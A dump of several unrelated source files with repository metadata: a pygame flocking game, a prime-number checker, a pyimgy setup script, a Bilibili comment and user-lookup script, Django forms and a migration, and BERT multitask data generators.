
    Recomputes the symmetric pairwise distance matrix for all sheep, then
    lets each sheep update itself.  A sheep whose update() returns 1 is
    removed from the flock; a return of 2 restarts the whole game.
    """
    # Compute the distances between each pair of boxes
    n_boxes = self.options.get( 'n_boxes' ).value
    self.distance_matrix = np.zeros( [n_boxes, n_boxes] )
    for i, j in itertools.combinations( range( len( self.sheep ) ), 2 ):
        s1 = self.sheep[i]
        s2 = self.sheep[j]
        d = math.hypot( s1.loc[0] - s2.loc[0], s1.loc[1] - s2.loc[1] )
        # distance is symmetric
        self.distance_matrix[i, j] = d
        self.distance_matrix[j, i] = d
    # BUGFIX: the original indexed self.sheep with range(len(...)) while
    # removing elements from it, which skips elements and can raise
    # IndexError once the list shrinks.  Iterate over a snapshot instead.
    for n, s in enumerate( list( self.sheep ) ):
        status = s.update(self.action_panel_rect, n)
        if status == 1:
            self.sheep.remove( s )
        elif status == 2:
            # Full game reset: the sheep list we are iterating is now stale,
            # so stop updating it.
            self.game_init()
            break
def handle_events(self):
    """Drain the pygame event queue, dispatching keyboard and mouse actions.

    RETURN restarts the game, SPACE toggles pause, ESCAPE quits.  Option
    shortcut keys edit the bound option and refresh its GUI widget.  Mouse
    clicks either hit a control-panel widget or spawn a new sheep in the
    action panel.  While paused this method keeps polling (blocking the
    caller) instead of returning.
    """
    # kmods = pygame.key.get_mods() # key modifiers
    paused = False
    while( True ):
        events = pygame.event.get()
        for event in events:
            if(event.type == KEYDOWN):
                if ( event.key == K_RETURN ):
                    self.game_init()
                elif (event.key == K_SPACE): paused = not paused
                elif (event.key == K_ESCAPE): self.quit()
                elif (event.key in self.keyboard_bindings.keys() ):
                    opt_key = self.keyboard_bindings[ event.key ]
                    opt = self.options.get( opt_key )
                    # If not toggling a bool type, get user input
                    if opt.val_type != bool :
                        self.editOption( opt_key )
                    # fire a positionless click on the associated gui element
                    option_gui = self.control_buttons[ opt_key ]
                    if ( option_gui != None ):
                        option_gui[1]()
                    # Hack around the option design to change the number of boxes
                    if opt_key == 'n_boxes' :
                        self.update_n_boxes()
            elif(event.type == MOUSEBUTTONDOWN):
                # If clicked control panel
                if self.control_panel_rect.collidepoint( event.pos ):
                    # find the widget under the cursor and fire its callback
                    for opt_name, button in self.control_buttons.items():
                        button_rect = button[0]
                        button_hit = button[1]
                        if button_rect.collidepoint( event.pos ):
                            button_hit(click_pos=event.pos)
                elif self.action_panel_rect.collidepoint( event.pos ):
                    # clicking the play field adds a sheep at the cursor
                    self.options.get( 'n_boxes' ).value += 1
                    self.add_sheep( loc_list=[event.pos] )
        if ( paused ):
            pygame.time.wait( 50 )
        else:
            return
def draw(self):
    """Redraw the action panel: every sheep's tail, body and optional ROI circle."""
    # clear screen
    self.screen.fill( self.color_bg, self.action_panel_rect )
    for s in self.sheep:
        first = True
        w,h = s.width, s.height
        for tail in s.tail:
            x,y = tail
            r = Rect(x, y, w, h)
            self.action_panel.fill(s.color, r)
            # only the head of the tail (current position) gets the ROI circle
            if first and self.options.get('draw_ROI').value:
                pygame.draw.circle( self.action_panel, s.color, (int(x), int(y)), int(self.options.get('ROI').value), 1 )
            first = False
    pygame.display.flip()
def quit(self):
    """Terminate the program immediately with exit status 0."""
    # sys.exit() simply raises SystemExit; raise it directly.
    raise SystemExit(0)
def display_box(self, x, y, string):
    "Print a message box at x,y"
    # blank the fixed 200x20 message area first, then render the text on top
    fontobject = pygame.font.Font(None,18)
    pygame.draw.rect(self.screen, self.color_bg, (x, y, 200, 20), 0)
    if( len( string ) > 0 ):
        self.screen.blit( fontobject.render(string, 1, (255,255,255)), (x, y) )
    pygame.display.flip()
def drawOption(self, x, y, key, val, editable=False):
    """Draw "key: val" at (x, y); when editable, block and collect keyboard input.

    Editing loop: BACKSPACE deletes the last char, RETURN accepts,
    MINUS inserts '_', any other key code <= 127 is appended as its ASCII
    character.  Always returns the (string) value.
    """
    val = str( val )
    self.display_box(x, y, "%s: %s" % (key, val) )
    if ( editable ):
        while 1:
            inkey = self.get_key()
            if inkey == K_BACKSPACE:
                val = val[0:-1]
            elif inkey == K_RETURN:
                break
            elif inkey == K_MINUS:
                val += "_"
            elif inkey <= 127:
                # plain ASCII key code maps directly to its character
                val += chr(inkey)
            # refresh the box after every keystroke
            self.display_box(x, y, "%s: %s" % (key, val) )
    return val
def get_key(self):
    """Busy-poll the event queue until the next KEYDOWN and return its key code."""
    while 1:
        event = pygame.event.poll()
        if event.type == KEYDOWN:
            return event.key
        else:
            pass
def randLoc(self):
    """Return a uniformly random [x, y] location inside the action panel."""
    panel = self.action_panel_rect
    x = np.random.randint(0, panel.width) + panel.x
    y = np.random.randint(0, panel.height) + panel.y
    return [x, y]
def randVelocity(self, init_speed):
    """Return a [vx, vy] velocity of magnitude init_speed in a random direction."""
    angle = np.radians( np.random.randint(0, 360) )
    vx = init_speed * np.cos(angle)
    vy = init_speed * np.sin(angle)
    return [vx, vy]
def randColor(self):
    """Return a random, reasonably bright (r, g, b) tuple (each channel in 50..254)."""
    red = np.random.randint( 50, 255 )
    green = np.random.randint( 50, 255 )
    blue = np.random.randint( 50, 255 )
    return ( red, green, blue )
# TODO:
# - make self.options accessible w/o .get(key) because this is really just a specialized dict
# - initialize options with a dict with required/optional keys (bools shouldn't need to supply min/max)
# - callbacks for value changes should be installed here
class OptionsHandler():
    """Keyed collection of Option objects with typed get/set/toggle access."""

    def __init__(self, option_list):
        """Build Options from (key, value, shortcut_key, value_type, min, max) tuples.

        Raises Exception if the same key appears twice.
        """
        self.options = {}
        for opt_spec in option_list:
            key, value, shortcut_key, value_type, min, max = opt_spec
            if key in self.options.keys():
                # BUGFIX: this branch referenced an undefined name 'name',
                # so reporting a duplicate key itself crashed with NameError.
                raise Exception(
                    "OptionsHandler initialized with duplicate key {0}={1} and {0}={2}".format(
                        key,
                        self.options[key].value,
                        value )
                )
            self.options[ key ] = Option( key, value, shortcut_key, value_type, min, max )

    def get(self, key):
        """Return the Option object for *key*; raise UnsupportedOptionException if unknown."""
        if( not key in self.options.keys() ):
            raise UnsupportedOptionException( key )
        return self.options[ key ]

    def keys(self):
        return self.options.keys()

    def values(self):
        return self.options.values()

    def items(self):
        """Return [key, value] pairs (plain values, not Option objects)."""
        ret = []
        for key, opt in self.options.items():
            ret.append( [key, opt.value] )
        return ret

    def toggle(self, key):
        """Flip a boolean option and return the new value; ValueError for non-bools."""
        option = self.get( key )
        if ( not option.val_type == bool ):
            raise ValueError( "Can't toggle non-boolean type: {0} (type={1})".format(key, option.val_type ) )
        option.value = not option.value
        return option.value

    def set(self, key, value):
        """Coerce *value* to the option's declared type and store it."""
        opt = self.get( key )
        # force option to its type
        # TODO: catch value exceptions and let the user keep trying
        opt.value = opt.val_type( value )
class Option():
    """One configurable setting: key, current value, shortcut key, type and bounds."""

    def __init__(self, key, value, shortcut_key=None, val_type=None, min=None, max=None ):
        self.key = key
        self.value = value
        self.shortcut_key = shortcut_key
        self.min = min
        self.max = max
        if val_type == None:
            # BUGFIX: the original called val_type(value) here, i.e.
            # None(value), which always raised TypeError.  Infer the type
            # from the initial value instead.
            self.val_type = type( value )
        else:
            self.val_type = val_type
class UnsupportedOptionException(Exception):
    """Raised when an unknown option key is requested."""

    def __init__(self, key):
        self.key = key

    def __str__(self):
        # fixed typo: message previously read "Unsuppored"
        return 'Unsupported option: %s' % self.key

    def __unicode__(self):
        # Python 2 leftover; harmless under Python 3.
        return self.__str__()
# NOTE:
# assumes left/right arrow graphic are same size, and square
# assumes width=100 ticks
class Slider():
    """A horizontal slider widget bound to a numeric Option.

    Assumes the left/right arrow graphics are the same size and square,
    and that the slide area is 100 ticks (pixels) wide.
    """

    def __init__(self, game, x, y, option):
        self.id = option.key
        self.option = option
        self.x = x # x position of slider object
        self.y = y # y position of slider object
        self.game = game # reference to the main game object
        self.per_index = ( float(self.option.max) - float(self.option.min) ) / 100 # value represented by one click (pixel)
        self.arrow_width = game.scroll_bar_right.get_width()
        # Draw the left/right arrows
        game.screen.blit( game.scroll_bar_left, (x,y) )
        game.screen.blit( game.scroll_bar_right, (x + 100 + self.arrow_width, y) )
        # Rect over which the needle moves
        self.slide_area = Rect( x + self.arrow_width, y, 100, self.arrow_width )
        # Draw a border around the slide area
        slide_area_border = Rect( x + self.arrow_width - 1, y - 1, 102, self.arrow_width + 2 )
        pygame.draw.rect( game.screen, (100,100,90), slide_area_border, 1 )
        # Initialize needle
        self.needle = Rect( 0, y, 1, self.arrow_width )
        self.update_needle_position()
        self.draw_needle()

    def update_needle_position( self ):
        """Place the needle to reflect the option's current value.

        NOTE(review): the offset uses value/max rather than
        (value - min) / (max - min); for options with min != 0 this is
        inconsistent with per_index -- confirm intended.
        """
        x_offset = 100 * (float(self.option.value) / self.option.max)
        self.needle.x = self.x + self.arrow_width + x_offset
        self.draw_needle()

    def draw_needle( self ):
        """Erase the slide area and draw the needle on top."""
        self.game.screen.fill( (0,0,0), self.slide_area )
        # cleanup: the needle was filled twice with identical arguments;
        # one call suffices.
        self.game.screen.fill( (50,50,50), self.needle )

    def inc(self):
        """Step the value up by one tick, clamped to option.max; return the value."""
        if self.option.value + self.per_index <= self.option.max :
            self.option.value += self.per_index
            self.needle.move_ip(1, 0)
            self.draw_needle()
        return self.option.value

    def dec(self):
        """Step the value down by one tick, clamped to option.min; return the value."""
        if self.option.value - self.per_index >= self.option.min :
            self.option.value -= self.per_index
            self.needle.move_ip(-1, 0)
            self.draw_needle()
        return self.option.value

    def click(self, pos):
        """Handle a click: left arrow decrements, right arrow increments.

        pos=None (keyboard-shortcut path) just re-syncs the needle with the
        option's value.  Returns the option's current value.
        """
        if pos == None:
            self.update_needle_position()
        elif pos[0] < self.x + self.game.scroll_bar_left.get_width() :
            self.dec()
        elif pos[0] > self.x + self.game.scroll_bar_left.get_width() + 100 :
            self.inc()
        return self.option.value
# Script entry point: build the game object and run its main loop.
if __name__ == '__main__':
    g = GameMain()
    g.loop()
| [
"ajwood@mta.ca"
] | ajwood@mta.ca |
b2149ffcc18045825f21ffeaf5c3673ba7206c0c | 56916eb9752cce2b7c48bf356e71cf0720a82126 | /Python-Programming/primeOrNot.py | af3d24f322d206a1d8594c7358406a28d4bbce40 | [] | no_license | pemagrg1/tkinter-sample-code | 8916e10f4b859862dd1031c759dd61292eb99fc4 | f66f79dd421cf83f18877aec0d58a8790adcc80d | refs/heads/master | 2022-04-29T15:52:00.893059 | 2022-03-29T05:40:09 | 2022-03-29T05:40:09 | 130,752,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # Check if given number is prime or not. Ex Prime numbers: 2, 3, 5, 7, 13
i, temp = 0, 0
n = int(input("please give a number : "))
for i in range(2, n//2):
if n % i == 0:
temp = 1
break
if temp == 1:
print("given number is not prime")
else:
print("given number is prime")
| [
"pema.grg1@gmail.com"
] | pema.grg1@gmail.com |
d89d258c7988794ab7a17bb1bc243baa9f8719ed | 6c563ee5d6018d08e1ddc414592e1e23c06c60cc | /setup.py | 3b4d2dccece35687f3e583454df3533ce809f197 | [
"MIT"
] | permissive | cesarfm/pyimgy | b3b3b92226fb9dfb8ea74dd2e26fdb6bc7795fc1 | ce333acc183b787b46b95bd8e44dc6679fd1547f | refs/heads/master | 2022-11-24T20:15:11.736867 | 2020-01-29T08:26:33 | 2020-01-29T08:26:33 | 218,964,448 | 2 | 0 | MIT | 2022-11-22T05:31:09 | 2019-11-01T10:28:34 | Jupyter Notebook | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
# pyimgy
A small library of image tools for Python
## Features
- `ImageConverter`: a universal, extensible component for easily converting images to different types, array shapes and normalizations.
- `core`: seamless conversion between numpy and Pillow; annotations for conversion and auto plot axes
- `image_crop`: `ImageCropper`, automatic cropping of an image's border frame
- `utils`: various tools
- get palette of an image
"""
from setuptools import setup, find_packages
DOCLINES = (__doc__ or '').split("\n")
long_description = "\n".join(DOCLINES[2:])
version = '0.1.0'
setup(
name='pyimgy',
version=version,
author='César Fuentes',
author_email='cesar.at.fuentes@gmail.com',
description='A small library of image tools for Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/cesarfm/pyimgy',
packages=find_packages(include=['pyimgy', 'pyimgy.*']),
install_requires=[
'typing',
'numpy',
'Pillow',
'matplotlib',
'opencv-python'
],
extras_require={
'torch': ['torch'],
'fastai': ['torch', 'fastai']
},
classifiers=[
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
)
| [
"cesar.at.fuentes@gmail.com"
] | cesar.at.fuentes@gmail.com |
a4a6857da44652a4332705772a0d0471a535883c | 08a029abcb595e1ef26ac4cb5751976ce17706ac | /main.py | f1cab476053a12360c9b940c38c26f437c05feed | [] | no_license | 221294583/danmu_cracker | fb96a99f77b8c7afd97fd2f0058c582653c77529 | 26e28846876b0b03410cf65f88fd2fc32a7e1fc1 | refs/heads/master | 2022-12-24T13:24:27.135703 | 2020-08-27T09:04:50 | 2020-08-27T09:04:50 | 263,972,990 | 2 | 2 | null | 2020-08-16T03:06:49 | 2020-05-14T16:51:55 | Python | UTF-8 | Python | false | false | 1,266 | py | import numpy as np
import getcomment
#import crackcrc32
import visit
import crack
def process():
    """Interactive pipeline: fetch Bilibili danmaku (bullet comments) for a
    video, filter them by a keyword, crack each sender's CRC32 hash back to
    a numeric user id, resolve nicknames, and print the results.

    NOTE(review): the trailing return of every local variable looks
    auto-generated; callers presumably ignore it -- confirm.
    """
    # prompt for the video URL/id (Chinese prompt kept verbatim)
    videocode=input("请输入视频地址:")
    list_ini=getcomment.getlist(videocode)
    list_ini.soup()
    list_ini.finder()
    list_ini.getmark()
    # keyword to filter bullet comments by
    bullet=(input('请输入要查找的关键词:'))
    all_bullet=list_ini.filterconcrete(bullet)
    all_crc32s=list_ini.getcrc32()
    #crackcrc32.create_table()
    crack.main()
    # reverse each CRC32 hash to the sender's uid
    all_uid=[]
    for ch in all_crc32s:
        temp=crack.crackl4(ch)[0]
        #print(type(temp))
        all_uid.append(temp)
    # build the user-space URL for every uid
    all_space=[]
    for ch in all_uid:
        temp=['http://space.bilibili.com/',ch]
        buffer=''.join(temp)
        all_space.append(buffer)
    user_nickname=visit.user_info(all_space)
    nicknames=user_nickname.getnickname()
    # print comment text, nickname and space URL for each match
    print('弹幕信息以及发送者信息:','\n')
    for i in range(len(all_bullet)):
        temp=['http://space.bilibili.com/',all_uid[i]]
        print('弹幕内容:',' ',all_bullet[i],' ','用户昵称:',' ',nicknames[i],' ','空间网址:',' ',(''.join(temp)))
    return all_bullet, all_crc32s, all_space, all_uid, bullet, ch, i, list_ini, nicknames, user_nickname, videocode
| [
"noreply@github.com"
] | 221294583.noreply@github.com |
a9c2ba91d8e2941c83227620c6cba49e96c59c48 | 9040048fd225aa3b755385ce8c14053d6e19f193 | /json_to_texts.py | 38f17d22dd6a20bd1016699c8439de13148f7a4e | [] | no_license | fireae/PageLayoutAnalyze | af13896a61286eb13a5490b8c097d5b7bc199650 | 05b6907ce329b7b827b21059a209cb93d348cccd | refs/heads/master | 2020-06-07T11:02:22.166135 | 2019-03-17T08:47:01 | 2019-03-17T08:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | import json
data_set = open('D:\Coding\\tensorflow-deeplab-resnet\dataset\\test.txt', 'r').readlines()
images = [image.split(' ')[0].replace("/JpegImages/", "").replace(".jpg", "") for image in data_set]
with open('predicted_boxes.json') as json_data:
d = json.load(json_data)
save_dir = 'D:\Coding\Object-Detection-Metrics\detections'
for idx, image in enumerate(images):
if idx == 38:
break
ws = open(image + ".txt", "w")
list_labels = d[image]['labels']
list_bbxs = d[image]['boxes']
list_conf = d[image]['confidence_score']
for idx,label in enumerate(list_labels):
bbx = list_bbxs[idx]
ws.write(list_labels[idx] + " " + str(list_conf[idx]) + " " +
str(bbx[0]) + " " + str(bbx[1]) + " " +
str(bbx[2]) + " " + str(bbx[3]) + "\n")
ws.close()
| [
"quoccbinh@gmail.com"
] | quoccbinh@gmail.com |
01afb879d493cb53f44e6bc66aeb36232e02039c | 28725525432ae67126ba48006361f939a35a8c2b | /imama/forms.py | 689ac60ca8e1597306fdc898b4747ff55d388ee6 | [] | no_license | ClaudiaStrm/cadastro-imama | 8d5083e8402cdf58818db01c62941c2ad6b71ddb | 2cd29858fed3565d400b4016a8747c50f2286058 | refs/heads/master | 2021-09-14T04:26:45.275044 | 2018-05-08T13:03:47 | 2018-05-08T13:03:47 | 110,761,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | from django import forms
from .models import Paciente, AmigoRosa
class PacienteForm(forms.ModelForm):
    """ModelForm covering the full intake questionnaire for a Paciente."""
    class Meta:
        model = Paciente
        # field order mirrors the interview flow: identification/contact,
        # socio-economic data, clinical history, then screening answers
        fields = ('nome', 'local_palestra', 'data_nascimento',
                  'sexo', 'etnia', 'telefone', 'celular', 'email', 'endereco',
                  'cidade', 'contato_nome', 'contato_telefone', 'amigo_rosa',
                  'data_entrevista','UAB_referencia', 'cartao_sus',
                  'sistema_saude', 'beneficio_governo', 'qtdade_filhos',
                  'estado_civil', 'idade_filhos', 'profissao',
                  'exerce_profissao', 'data_menarca', 'menopausa',
                  'data_menopausa', 'reposicao_hormonal', 'data_reposicao_hormonal',
                  'local_trabalho', 'sustenta_familia', 'pessoas_familia',
                  'escolaridade', 'motivos_servico_saude', 'ultima_consulta_ginecologista',
                  'auto_exame', 'exame_profissional', 'data_mamografia',
                  'conclusao_laudo_mamografia', 'data_outros_exames', 'conclusao_laudo_outros_exames',
                  'orientacoes_exames', 'alteracao_mama', 'familiares_cancer_mama',
                  'cirurgia_mamas', 'tipo_cirurgia_mamas', 'observacoes_entrevista',
                  )
class AmigoRosaForm(forms.ModelForm):
    """ModelForm for AmigoRosa volunteers."""
    class Meta:
        model = AmigoRosa
        # BUGFIX: 'email' was listed twice in the fields tuple; the
        # duplicate is redundant for Django's ModelForm field selection.
        fields = ('nome', 'endereco', 'contato', 'celular',
                  'data_nascimento', 'email',
                  'curso', 'cpf', 'rg',
                  )
| [
"claudiasm@protonmail.com"
] | claudiasm@protonmail.com |
cbbe67c6d8b42f1f434378ce427870868349c359 | 4a806e7149bc6ee784e72ac8be068953180bf202 | /app01/migrations/0001_initial.py | 5e04b1a47e8c96d5ce2fdff23323bdd00efc010c | [] | no_license | aiwenfeixiang/highcharts | 9f99e63c9fc68a2e8b16f05bc17dd825f24f6402 | 3673b9de70582736d67cf672e43717a7da2845eb | refs/heads/master | 2020-09-09T12:19:01.303973 | 2019-11-13T11:42:46 | 2019-11-13T11:42:46 | 221,444,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2019-11-06 11:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (see header above); migrations are normally
    # left untouched once applied.

    initial = True

    dependencies = [
    ]

    operations = [
        # Depart: a department with a display title
        migrations.CreateModel(
            name='Depart',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=32, verbose_name='部门')),
            ],
        ),
        # Server: a host belonging to a Depart (cascade-deleted with it)
        migrations.CreateModel(
            name='Server',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('hostname', models.CharField(max_length=32, verbose_name='主机名')),
                ('depart', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app01.Depart', verbose_name='部门')),
            ],
        ),
    ]
| [
"853648122@qq.com"
] | 853648122@qq.com |
acdee8e7dc59c9448b02b36d294aed46fbe74f2f | 0ca3a635fe2358ae562c04516226753fcd4a6729 | /src/create_generators.py | 64893b0a27c4158567b3833c44c58fc9d82963d0 | [] | no_license | YL1113/bert-multitask-learning | 9302037537c9c50a49ba2bb53a2f1db15904c7e2 | 182cb78efba46905cc1a804dcd7771b40475e874 | refs/heads/master | 2020-04-29T16:57:56.837957 | 2019-03-18T07:06:05 | 2019-03-18T07:06:05 | 176,280,952 | 1 | 0 | null | 2019-03-18T12:32:51 | 2019-03-18T12:32:50 | null | UTF-8 | Python | false | false | 16,070 | py | import random
from copy import copy
import numpy as np
import tensorflow as tf
from .utils import (punc_augument, tokenize_text_with_seqs,
create_mask_and_padding, create_masked_lm_predictions,
truncate_seq_pair, add_special_tokens_with_seqs,
BOS_TOKEN, EOS_TOKEN,
create_instances_from_document)
from .tokenization import printable_text
def create_single_problem_generator(problem,
                                    inputs_list,
                                    target_list,
                                    label_encoder,
                                    params,
                                    tokenizer,
                                    mode):
    """Function to create iterator for single problem

    This function will:
    1. Do some text cleaning using original bert tokenizer, if
        problem type is sequential tagging, corresponding labels
        will be removed.

        Example:
        Before: inputs: ['a', '&', 'c'] target: [0, 0, 1]
        After: inputs: ['a', 'c'] target: [0, 1]
    2. Add [CLS], [SEP] tokens
    3. Padding
    4. yield result dict

    Arguments:
        problem {str} -- problem name
        inputs_list {list } -- inputs list
        target_list {list} -- target list, should have the same length as inputs list
        label_encoder {LabelEncoder} -- label encoder
        params {Params} -- params
        tokenizer {tokenizer} -- Bert Tokenizer
        mode {str} -- 'train' enables punctuation / mask-LM augmentation
    """
    problem_type = params.problem_type[problem]

    # whether this problem is sequential labeling
    # for sequential labeling, targets needs to align with any
    # change of inputs
    is_seq = problem_type in ['seq_tag']

    for ex_index, example in enumerate(zip(inputs_list, target_list)):
        raw_inputs, raw_target = example

        # punctuation augumentation
        if params.punc_replace_prob > 0 and mode == 'train':
            raw_inputs = punc_augument(raw_inputs, params)

        # tokenize inputs, now the length is fixed, target == raw_target
        # dict inputs carry a text pair under keys 'a' and 'b'
        if isinstance(raw_inputs, dict):
            tokens_a, target = tokenize_text_with_seqs(
                tokenizer, raw_inputs['a'], raw_target, is_seq)
            tokens_b, _ = tokenize_text_with_seqs(
                tokenizer, raw_inputs['b'], raw_target)
        else:
            tokens_a, target = tokenize_text_with_seqs(
                tokenizer, raw_inputs, raw_target, is_seq)
            tokens_b = None

        if tokens_b is not None and is_seq:
            raise NotImplementedError(
                'Sequence Labeling with tokens b is not implemented')

        if not tokens_a:
            continue

        # check whether tokenization changed the length
        # NOTE(review): when raw_inputs is a dict this compares the dict's
        # key count against the token count -- confirm intended.
        if len(raw_inputs) != len(tokens_a):
            tf.logging.warning('Data %d broken' % ex_index)
            continue

        # truncate tokens and target to max_seq_len
        tokens_a, tokens_b, target = truncate_seq_pair(
            tokens_a, tokens_b, target, params.max_seq_len, is_seq=is_seq)

        # add [SEP], [CLS] tokens
        tokens, segment_ids, target = add_special_tokens_with_seqs(
            tokens_a, tokens_b, target, is_seq)

        # train mask lm as augument task while training
        if params.augument_mask_lm and mode == 'train':
            rng = random.Random()
            (mask_lm_tokens, masked_lm_positions,
             masked_lm_labels) = create_masked_lm_predictions(
                 tokens,
                 params.masked_lm_prob,
                 params.max_predictions_per_seq,
                 list(tokenizer.vocab.keys()), rng)
            # pad the masked copy of the inputs to max_seq_len ...
            _, mask_lm_tokens, _, _ = create_mask_and_padding(
                mask_lm_tokens, copy(segment_ids), copy(target), params.max_seq_len, is_seq)
            # ... and the LM labels/positions to max_predictions_per_seq
            masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
                masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
            mask_lm_input_ids = tokenizer.convert_tokens_to_ids(
                mask_lm_tokens)
            masked_lm_ids = tokenizer.convert_tokens_to_ids(masked_lm_labels)

        input_mask, tokens, segment_ids, target = create_mask_and_padding(
            tokens, segment_ids, target, params.max_seq_len, is_seq)

        # create mask and padding for labels of seq2seq problem
        if problem_type in ['seq2seq_tag', 'seq2seq_text']:
            target, _, _ = truncate_seq_pair(
                target, None, None, params.decode_max_seq_len, is_seq=is_seq)
            # since we initialize the id to 0 in prediction, we need
            # to make sure that BOS_TOKEN is [PAD]
            target = [BOS_TOKEN] + target + [EOS_TOKEN]
            label_mask, target, _, _ = create_mask_and_padding(
                target, [0] * len(target), None, params.decode_max_seq_len)

        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        # sequence problems encode a list of labels, classification a single one
        if isinstance(target, list):
            label_id = label_encoder.transform(target).tolist()
            label_id = [np.int32(i) for i in label_id]
        else:
            label_id = label_encoder.transform([target]).tolist()[0]
            label_id = np.int32(label_id)

        assert len(input_ids) == params.max_seq_len
        assert len(input_mask) == params.max_seq_len
        assert len(segment_ids) == params.max_seq_len, segment_ids
        if is_seq:
            assert len(label_id) == params.max_seq_len

        # logging in debug mode (first five examples only)
        if ex_index < 5:
            tf.logging.debug("*** Example ***")
            tf.logging.debug("tokens: %s" % " ".join(
                [printable_text(x) for x in tokens]))
            tf.logging.debug("input_ids: %s" %
                             " ".join([str(x) for x in input_ids]))
            tf.logging.debug("input_mask: %s" %
                             " ".join([str(x) for x in input_mask]))
            tf.logging.debug("segment_ids: %s" %
                             " ".join([str(x) for x in segment_ids]))
            if is_seq or problem_type in ['seq2seq_tag', 'seq2seq_text']:
                tf.logging.debug("%s_label_ids: %s" %
                                 (problem, " ".join([str(x) for x in label_id])))
                tf.logging.debug("%s_label: %s" %
                                 (problem, " ".join([str(x) for x in target])))
            else:
                tf.logging.debug("%s_label_ids: %s" %
                                 (problem, str(label_id)))
                tf.logging.debug("%s_label: %s" %
                                 (problem, str(target)))
            if params.augument_mask_lm and mode == 'train':
                tf.logging.debug("mask lm tokens: %s" % " ".join(
                    [printable_text(x) for x in mask_lm_tokens]))
                tf.logging.debug("mask lm input_ids: %s" %
                                 " ".join([str(x) for x in mask_lm_input_ids]))
                tf.logging.debug("mask lm label ids: %s" %
                                 " ".join([str(x) for x in masked_lm_ids]))
                tf.logging.debug("mask lm position: %s" %
                                 " ".join([str(x) for x in masked_lm_positions]))

        # create return dict
        if not params.augument_mask_lm:
            return_dict = {
                'input_ids': input_ids,
                'input_mask': input_mask,
                'segment_ids': segment_ids,
                '%s_label_ids' % problem: label_id
            }
        else:
            # with probability augument_rate, substitute the masked-LM view
            # of the inputs; otherwise emit zeroed LM features
            if mode == 'train' and random.uniform(0, 1) <= params.augument_rate:
                return_dict = {
                    'input_ids': mask_lm_input_ids,
                    'input_mask': input_mask,
                    'segment_ids': segment_ids,
                    '%s_label_ids' % problem: label_id,
                    "masked_lm_positions": masked_lm_positions,
                    "masked_lm_ids": masked_lm_ids,
                    "masked_lm_weights": masked_lm_weights,
                }
            else:
                return_dict = {
                    'input_ids': input_ids,
                    'input_mask': input_mask,
                    'segment_ids': segment_ids,
                    '%s_label_ids' % problem: label_id,
                    "masked_lm_positions": np.zeros([params.max_predictions_per_seq]),
                    "masked_lm_ids": np.zeros([params.max_predictions_per_seq]),
                    "masked_lm_weights": np.zeros([params.max_predictions_per_seq]),
                }

        if problem_type in ['seq2seq_tag', 'seq2seq_text']:
            return_dict['%s_mask' % problem] = label_mask

        yield return_dict
def create_pretraining_generator(problem,
                                 inputs_list,
                                 target_list,
                                 label_encoder,
                                 params,
                                 tokenizer
                                 ):
    """Yield BERT pretraining examples (masked LM + next-sentence prediction).

    Slight modification of original code.  inputs_list must be a list of
    documents, each a list of sentences, each a list of tokens/strings.
    problem, target_list and label_encoder are unused here; presumably kept
    so all generators share one call signature -- TODO confirm.

    Raises:
        ValueError -- Input format not right
    """
    if not isinstance(inputs_list[0][0], list):
        raise ValueError('inputs is expected to be list of list of list.')

    # re-tokenize every sentence with the BERT tokenizer
    all_documents = []
    for document in inputs_list:
        all_documents.append([])
        for sentence in document:
            all_documents[-1].append(tokenizer.tokenize('\t'.join(sentence)))

    # drop empty documents and shuffle for NSP sampling
    all_documents = [d for d in all_documents if d]
    rng = random.Random()
    rng.shuffle(all_documents)

    vocab_words = list(tokenizer.vocab.keys())
    instances = []

    print_count = 0
    # each document is processed dupe_factor times with different masks
    for _ in range(params.dupe_factor):
        for document_index in range(len(all_documents)):
            instances = create_instances_from_document(
                all_documents,
                document_index,
                params.max_seq_len,
                params.short_seq_prob,
                params.masked_lm_prob,
                params.max_predictions_per_seq,
                vocab_words, rng)
            for instance in instances:
                tokens = instance.tokens
                segment_ids = list(instance.segment_ids)

                input_mask, tokens, segment_ids, _ = create_mask_and_padding(
                    tokens, segment_ids, None, params.max_seq_len)
                masked_lm_positions = list(instance.masked_lm_positions)
                masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
                    instance.masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
                input_ids = tokenizer.convert_tokens_to_ids(tokens)
                masked_lm_ids = tokenizer.convert_tokens_to_ids(
                    masked_lm_labels)
                next_sentence_label = 1 if instance.is_random_next else 0

                yield_dict = {
                    "input_ids": input_ids,
                    "input_mask": input_mask,
                    "segment_ids": segment_ids,
                    "masked_lm_positions": masked_lm_positions,
                    "masked_lm_ids": masked_lm_ids,
                    "masked_lm_weights": masked_lm_weights,
                    "next_sentence_label_ids": next_sentence_label
                }

                # log the first three emitted examples for debugging
                if print_count < 3:
                    tf.logging.debug('%s : %s' %
                                     ('tokens', ' '.join([str(x) for x in tokens])))
                    for k, v in yield_dict.items():
                        if not isinstance(v, int):
                            tf.logging.debug('%s : %s' %
                                             (k, ' '.join([str(x) for x in v])))
                    print_count += 1

                yield yield_dict
def create_generator(params, mode, epoch):
    """Function to create iterator for multiple problem

    This function dose the following things:
    1. Create dummy labels for each problems.
    2. Initialize all generators
    3. Sample a problem to train at this batch. If eval, take turns
    4. Create a loss multiplier
    5. Tried to generate samples for target problem, if failed, init gen
    6. Add dummy label to other problems

    Example:
